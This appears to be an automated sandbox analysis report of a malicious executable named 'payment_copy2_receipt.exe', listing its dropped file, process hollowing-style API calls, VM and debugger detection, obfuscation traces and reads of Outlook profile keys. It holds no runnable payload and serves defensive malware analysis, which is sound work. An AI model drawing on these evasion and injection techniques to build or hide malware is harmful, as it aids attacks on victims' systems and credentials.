Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99A50 NtCreateFile,LdrInitializeThunk,		3_2_00A99A50
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A995D0 NtClose,LdrInitializeThunk,		3_2_00A995D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99540 NtReadFile,LdrInitializeThunk,		3_2_00A99540
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,		3_2_00A996E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,		3_2_00A99660
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,		3_2_00A997A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,		3_2_00A99780
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99FE0 NtCreateMutant,LdrInitializeThunk,		3_2_00A99FE0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,		3_2_00A99710
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A998A0 NtWriteVirtualMemory,		3_2_00A998A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99820 NtEnumerateKey,		3_2_00A99820
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A9B040 NtSuspendThread,		3_2_00A9B040
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A999D0 NtCreateProcessEx,		3_2_00A999D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99950 NtQueueApcThread,		3_2_00A99950
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99A80 NtOpenDirectoryObject,		3_2_00A99A80
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99A10 NtQuerySection,		3_2_00A99A10
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A9A3B0 NtGetContextThread,		3_2_00A9A3B0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99B00 NtSetValueKey,		3_2_00A99B00
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A995F0 NtQueryInformationFile,		3_2_00A995F0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99520 NtWaitForSingleObject,		3_2_00A99520
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A9AD30 NtSetContextThread,		3_2_00A9AD30
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99560 NtWriteFile,		3_2_00A99560
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A996D0 NtCreateKey,		3_2_00A996D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99610 NtEnumerateValueKey,		3_2_00A99610
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99670 NtQueryInformationProcess,		3_2_00A99670
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99650 NtQueryValueKey,		3_2_00A99650
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99730 NtQueryVirtualMemory,		3_2_00A99730
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A9A710 NtOpenProcessToken,		3_2_00A9A710
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99760 NtOpenProcess,		3_2_00A99760
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99770 NtSetInformationFile,		3_2_00A99770
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A9A770 NtOpenThread,		3_2_00A9A770

Source: payment_copy2_receipt.exe	ReversingLabs: Detection: 53%
Source: payment_copy2_receipt.exe	Virustotal: Detection: 38%

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

File read: C:\Users\user\Desktop\payment_copy2_receipt.exe

Jump to behavior

Source: payment_copy2_receipt.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\payment_copy2_receipt.exe C:\Users\user\Desktop\payment_copy2_receipt.exe
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q			Jump to behavior

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

File created: C:\Users\user~1\AppData\Local\Temp\nshAD15.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@6/5

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004043F5

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Command line argument: ~nA

1_2_00416DD0

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: msdt.pdbGCTL source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040AB96 push ecx; ret		1_2_0040ABA9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004210FC push eax; ret		3_2_0042114F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00421149 push eax; ret		3_2_0042114F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00421152 push eax; ret		3_2_004211B9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004211B3 push eax; ret		3_2_004211B9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0042225A push dword ptr [3115C0DBh]; ret		3_2_0042230D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041B2F0 push esp; ret		3_2_0041B311
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004054F6 pushad ; retf 007Ah		3_2_004054FA
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00409DDD push ss; retf		3_2_00409DE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004056A2 pushfd ; retf		3_2_004056B1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00405700 pushfd ; retf		3_2_004056B1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041A721 push eax; retf		3_2_0041A738
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041A739 push eax; retf		3_2_0041A738
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AAD0D1 push ecx; ret		3_2_00AAD0E4

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

File created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 3_2_00A86A60 rdtscp

3_2_00A86A60

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	API coverage: 7.2 %
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	API coverage: 8.5 %

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		0_2_00405620
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,		0_2_00405FF6
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00402654 FindFirstFileA,		0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00410290 FindFirstFileExW,		1_2_00410290

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

API call chain: ExitProcess graph end node

Source: explorer.exe, 00000004.00000000.340277436.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.310477461.0000000007B66000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000004.00000000.335776524.0000000005FE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.305057483.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000004.00000000.335575744.0000000005F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_0040A932

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 1_2_0041265A GetProcessHeap,

1_2_0041265A

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 3_2_00A86A60 rdtscp

3_2_00A86A60

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040EC98 mov eax, dword ptr fs:[00000030h]		1_2_0040EC98
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0041133B mov eax, dword ptr fs:[00000030h]		1_2_0041133B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h]		1_2_00B80019
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h]		1_2_00B80005
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h]		1_2_00B8007A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h]		1_2_00B80149
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A990AF mov eax, dword ptr fs:[00000030h]		3_2_00A990AF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]		3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]		3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]		3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]		3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]		3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]		3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]		3_2_00A8F0BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]		3_2_00A8F0BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]		3_2_00A8F0BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59080 mov eax, dword ptr fs:[00000030h]		3_2_00A59080
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]		3_2_00AD3884
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]		3_2_00AD3884
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7B8E4 mov eax, dword ptr fs:[00000030h]		3_2_00A7B8E4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7B8E4 mov eax, dword ptr fs:[00000030h]		3_2_00A7B8E4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]		3_2_00A540E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]		3_2_00A540E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]		3_2_00A540E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A558EC mov eax, dword ptr fs:[00000030h]		3_2_00A558EC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]		3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]		3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]		3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]		3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]		3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]		3_2_00AEB8D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]		3_2_00A8002D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]		3_2_00A8002D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]		3_2_00A8002D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]		3_2_00A8002D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]		3_2_00A8002D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]		3_2_00A6B02A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]		3_2_00A6B02A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]		3_2_00A6B02A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]		3_2_00A6B02A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]		3_2_00A7A830
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]		3_2_00A7A830
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]		3_2_00A7A830
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]		3_2_00A7A830
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]		3_2_00B24015
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]		3_2_00B24015
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]		3_2_00AD7016
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]		3_2_00AD7016
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]		3_2_00AD7016
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B12073 mov eax, dword ptr fs:[00000030h]		3_2_00B12073
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B21074 mov eax, dword ptr fs:[00000030h]		3_2_00B21074
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]		3_2_00A70050
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]		3_2_00A70050
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]		3_2_00A861A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]		3_2_00A861A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD69A6 mov eax, dword ptr fs:[00000030h]		3_2_00AD69A6
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]		3_2_00AD51BE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]		3_2_00AD51BE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]		3_2_00AD51BE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]		3_2_00AD51BE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]		3_2_00B149A4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]		3_2_00B149A4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]		3_2_00B149A4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]		3_2_00B149A4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
